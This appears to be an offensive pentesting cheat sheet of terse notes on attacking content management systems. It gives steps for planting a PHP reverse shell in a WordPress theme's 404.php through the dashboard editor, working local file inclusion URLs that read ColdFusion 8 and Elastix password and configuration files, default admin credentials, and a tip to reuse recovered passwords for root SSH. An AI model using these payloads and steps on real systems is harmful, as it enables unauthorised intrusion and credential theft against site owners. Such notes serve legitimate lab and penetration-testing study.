CMS
Enumerate version and few other details
Google their vulnerability
Wordpress
admin page
Configuration files
Enumerate users
Uploading shell in WP_THEME
Login into WP_dashboard and explore the appearance tab.
2. Now go in Themes section under Appearance and select Editor and there select twenty fifteen templet and get into 404.php
3. You see a text area for editing templet, inject your malicious php code here to obtain reverse connection of the webserver.
4. Update the file and go to following url - http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php
5. you will have your session upon execution of 404.php file. :)
Drupal
Droopescan
Find version
/CHANGELOG.txt
Adobe Cold Fusion
Determine version
Version 8 Vulnerability
fckeditor
LFI
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Elastix
Google the vulnerabitlities
default login are
admin:adminat/vtigercrm/able to upload shell in profile-photo
2.2.0 - 'graph.php' Local File Inclusion
http://server/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
Note: Most probably this will be same password for root user too , so you can directly ssh through it
Joomla
Admin page -
/administratorConfiguration files
Mambo
Config files
ZyXel
Configuration files
Last updated
